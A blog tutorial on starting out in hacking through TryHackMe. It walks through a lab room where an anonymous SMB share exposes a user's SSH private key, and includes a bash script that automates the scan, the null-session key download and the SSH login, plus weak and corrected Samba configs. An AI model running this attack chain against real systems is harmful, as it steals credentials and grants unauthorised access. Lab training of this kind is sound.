How can you learn to hack — without breaking the rules?
You might be an expert at learning new skills. But how do you learn to hack real-world vulnerabilities without landing in trouble?
There are 3 reasons why I think learning how to hack is an important skill:
1. Explosive growth in connected systems and vulnerabilities
It is no surprise that the pace of data generation keeps accelerating; by one estimate, the data generated per second in the financial services sector alone was set to grow by over 700% in 2021. With more data and more connected systems comes a larger attack surface. Recent events show attackers exploiting every avenue available, including supply-chain weaknesses: compromising one trusted vendor in order to reach many organizations at once. That is what happened in the SolarWinds Orion breach discovered in December 2020, which affected multiple Fortune 500 companies and government agencies. A basic understanding of how networked systems are attacked, and of how attackers take advantage of weaknesses between them, helps those who generate and use data reduce the risk of cyber-attacks.
2. A great way to learn networking fundamentals:
Pablo Picasso once said:
“Learn the rules like a pro, so you can break them like an artist”
Learning to hack teaches you solid Linux, networking, and Internet fundamentals, all of which are important data science fundamentals too. In the process you also learn how various protocols are built, and you get a deeper understanding of them by enumerating and exploiting weaknesses in real services.
3. Jobs, Jobs, Jobs!
All of this sounds interesting, but where’s the money?
There is a growing job market in cybersecurity, and a shortage of people to fill it. One recent study predicts a $15,000 salary boost for employees with cloud security skills. Companies are also expected to use AI-based technologies to complement existing cybersecurity approaches, which could create new demand for people at the interface of data science, machine learning, and cybersecurity.
OK, now that you are convinced that hacking is worth some effort, let's begin!
Getting started with TryHackMe
TryHackMe is a website created by two cybersecurity students who found learning cybersecurity to be a fragmented and frustrating experience because of the lack of hands-on resources.
TryHackMe is organized into rooms, each dedicated to a concept in cybersecurity. A room contains several questions that you must answer in order to complete it, which requires accessing (and attacking) the machines dedicated to that room through their IP addresses.
You can attack these machines from an attacking machine that TryHackMe provides in the browser, or from your own machine over a VPN connection (OpenVPN). The lessons are typically not straightforward, and completing them takes a combination of knowledge, persistence, creativity and, of course, googling.
I prefer the OpenVPN method: it gives me a dedicated virtual machine that I can also use to practice without connecting to TryHackMe, and attacking a target over the VPN is much quicker than using TryHackMe's attack machine, which for some reason is extremely slow.
Installing a Kali Linux Virtual Machine
Kali Linux is the hacker's go-to operating system. It comes with most hacking tools pre-installed: Nmap, Metasploit, Hydra and many more are a single command away. It is quite easy to install Kali Linux as a VMware virtual machine, and running it in a VM rather than on your everyday machine also keeps your tools and anything you download from a target isolated from your own files.
First you need to download VMware for your operating system.
Next, download the prebuilt Kali Linux virtual machine image for VMware and import it. The image ships with a default login (user kali, password kali); change that password before you connect the VM to any network. That's it, you are all set!
Exploiting common vulnerabilities
The Complete Beginner learning path on TryHackMe has a room on network services, which introduces some common vulnerabilities.
The first service covered is SMB, so let's use it to demonstrate the process of hacking. SMB, the Server Message Block protocol, is a communication protocol for sharing access to files, printers, serial ports and other resources on a network. SMB vulnerabilities have featured in prominent cybersecurity incidents.
For example, the 2017 WannaCry ransomware, which encrypted data on computers running Windows and demanded a ransom in return for decryption, spread by exploiting a vulnerability in Microsoft's SMBv1 implementation (MS17-010, the bug behind the EternalBlue exploit).
This room is oriented around finding the SSH private key of a particular user, which is stored on an SMB file share that has not been properly configured. Note the distinction: WannaCry abused a bug in the protocol implementation, whereas this room abuses a misconfiguration of an otherwise correctly working server.
Connecting to TryHackMe and the target machine
First, download the TryHackMe OpenVPN configuration pack for Linux.
Next, connect to the TryHackMe servers through OpenVPN.
If you are successfully connected, you should see a tick near the connected button.
Next, go ahead and open the TryHackMe room on network services. Click on start the machine, and you should see the IP address.
Now you are all set to start the hacking process and exploit the SMB misconfiguration!
The first part of the process is enumeration: once you know the target IP address, find out as much as possible about its services, applications, and operating system. A great tool for this is Nmap, an open-source network scanner that reveals open ports and the services likely listening on them. Running:
nmap [IP address]
lists the open ports among the 1,000 most commonly used ports (Nmap's default, which is not the same as the first 1,000 port numbers). On this target, three ports are open, including the SSH and SMB services the room is built around.
Enum4Linux, pre-installed on Kali Linux, is a great tool for enumerating SMB hosts: it lists users, groups, and shares. Through Enum4Linux you find a file share that sticks out, named "profiles", which seems to contain user profile information.
The next step is exploitation: seeing whether the information gathered during enumeration can be used to gain access to the machine. We use smbclient to check whether the SMB share can be opened with a null session, that is, without presenting any credentials.
In this case, the share has been improperly configured to let an anonymous user (username Anonymous, blank password) access the profiles share.
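For contrast, here is what that kind of misconfiguration looks like on the server side. This is an added illustration, not configuration from the post or from the room: a Samba share definition that permits guest access, followed by a corrected one (shown as two separate smb.conf files). The share name comes from the room and the user name is the one the post reports later; the paths are assumptions.

```ini
; WEAK (assumed smb.conf fragment): anyone can read "profiles" without a password
[global]
   ; unknown users are mapped to the guest account, so "Anonymous" gets in
   map to guest = Bad User

[profiles]
   ; assumed path; it exports the users' home directories, including cactus/.ssh
   path = /home
   guest ok = yes
   read only = yes

; CORRECTED (second file): require a real account and refuse null sessions
[global]
   map to guest = Never
   ; 2 = no anonymous (null-session) connections at all
   restrict anonymous = 2

[profiles]
   path = /srv/profiles
   guest ok = no
   valid users = cactus
   read only = yes
```

Access control is only half of the fix: a private key sitting on an exported share is the real problem, and it should live in the user's home directory with owner-only permissions rather than on any share at all.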
You get lucky and find the user’s .ssh directory within the share.
As you suspect, the .ssh folder contains the user's RSA key pair: id_rsa (the private key) and id_rsa.pub (the public key).
You can download both keys to your local computer from within the smbclient session.
On your local computer, the comment field at the end of the id_rsa.pub file tells you that the username is cactus.
RSA public keys and username from id_rsa.pub file
Next, copy both keys into your ~/.ssh directory, using a file name that does not collide with your own keys, and restrict the private key to owner-only access (chmod 600 on the file). The point is not to give yourself read and write access, which you already have; it is that ssh refuses to use a private key that other users on your machine can read. Now point ssh at that key file and you can log in to the compromised machine as cactus!
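Putting the room's steps together, here is an added example (my own script, not code from the original post or from TryHackMe) that runs the whole chain from the attacking VM: scan, list shares, download the key pair over a null session, fix the key permissions and log in. It assumes the share is named profiles (from the room) and that the user's directory on the share is named after the login, defaulting to cactus as reported above; the key comment and the scan output used by the offline demo are constructed. Run it with the target IP as the first argument once the VPN is up; without arguments it only exercises the parsing helpers on the sample data.

```shell
#!/usr/bin/env bash
# Added example for this post (not code from TryHackMe or the original author).
# Assumptions: share "profiles", user directory on the share = login name
# (default "cactus"), and the constructed sample data below.

# Recover the login name from the comment field of an OpenSSH public key.
# id_rsa.pub reads "ssh-rsa AAAA... user@host"; field 3 is that comment.
key_user() {                       # $1: one line of id_rsa.pub
    printf '%s\n' "$1" | awk '{ sub(/@.*/, "", $3); print $3 }'
}

# Print open ports from nmap grepable output (-oG) as "port/proto service".
# Each entry in the Ports: field is port/state/proto/owner/service/rpc/version;
# plain nmap (no -sV) leaves version empty, so splitting on ", " is safe.
open_ports() {                     # $1: path to the .gnmap file
    awk '/^Host:/ {
        n = split($0, parts, "\t")
        for (i = 1; i <= n; i++) if (parts[i] ~ /^Ports: /) {
            sub(/^Ports: /, "", parts[i])
            m = split(parts[i], entries, ", ")
            for (j = 1; j <= m; j++) {
                split(entries[j], f, "/")
                if (f[2] == "open") print f[1] "/" f[3] " " f[5]
            }
        }
    }' "$1"
}

# Put a downloaded private key in its own file with owner-only permissions.
# ssh refuses a key readable by others, and a fresh name keeps your own
# ~/.ssh/id_rsa intact.  Prints "ok" when the resulting mode is exactly 0600.
install_key() {                    # $1: downloaded id_rsa, $2: destination path
    cp "$1" "$2" && chmod 600 "$2" || return 1
    if find "$2" -perm 600 -print | grep -q .; then echo ok; else echo bad; fi
}

# The live chain against the room target.  Needs nmap, enum4linux, smbclient
# and ssh on the attacking VM plus an active OpenVPN session.
attack() {                         # $1: target IP, $2: user dir on the share
    local ip="$1" dir="${2:-cactus}" work user key
    work=$(mktemp -d)
    nmap -oG "$work/scan.gnmap" "$ip" >/dev/null
    echo "open ports:"; open_ports "$work/scan.gnmap"
    enum4linux -S "$ip"                              # share list: look for "profiles"
    # Null session (-N = no password); smbclient saves files in the current dir.
    (cd "$work" && smbclient -N "//$ip/profiles" \
        -c "cd $dir/.ssh; get id_rsa; get id_rsa.pub")
    user=$(key_user "$(cat "$work/id_rsa.pub")")
    key="$HOME/.ssh/thm_${ip}_${user}"
    install_key "$work/id_rsa" "$key" >/dev/null
    ssh -i "$key" -o IdentitiesOnly=yes "$user@$ip"
}

# Constructed sample data so the helpers can be exercised offline.
SAMPLE_PUB='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCexample cactus@lab'
sample_scan() {                    # writes a fake .gnmap file, prints its path
    local f; f=$(mktemp)
    printf 'Host: 10.10.0.1 ()\tStatus: Up\n' > "$f"
    printf 'Host: 10.10.0.1 ()\tPorts: 22/open/tcp//ssh///, 139/open/tcp//netbios-ssn///, 445/open/tcp//netbios-ssn///\tIgnored State: closed (997)\n' >> "$f"
    echo "$f"
}

if [ $# -gt 0 ]; then
    attack "$@"
else
    echo "usage: $0 <target-ip> [user-dir]  (no target given: offline demo)"
    f=$(sample_scan); open_ports "$f"; rm -f "$f"
    key_user "$SAMPLE_PUB"
fi
```

Two details are worth noticing: the downloaded key goes into a file of its own and ssh is started with IdentitiesOnly=yes, so your personal key is neither overwritten nor offered to the target; and the enumeration output is parsed from nmap's grepable format rather than screen-scraped, which is what you want once you start scripting against more than one room.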
Congratulations, you have completed the room!
Apart from SMB, TryHackMe features numerous other communication protocols and vulnerabilities to exploit.
There is currently a cybersecurity talent drought; by some estimates there is a gap of around 3 million qualified cybersecurity professionals. I have shown how to get started with enumerating and exploiting a vulnerable host. However, cybersecurity is much more than preventing individual exploits. With the growing complexity of connected interfaces, it is becoming harder and harder to secure systems against attackers.
This is why there are huge opportunities at the intersection of AI and cybersecurity. The UK company Darktrace, which recently went public, says it stops cyber disruptions through self-learning AI, and it has recently partnered with Microsoft to protect organizations that use various Microsoft services.
I hope this tutorial motivates you to start your hacking journey! You may not end up becoming a penetration tester, but there is a lot you can learn while gaining cybersecurity skills. And who knows, maybe you will land an awesome career at the intersection of AI and cybersecurity!
Senior Data Scientist in NLP. Creator of https://www.answerchatai.com/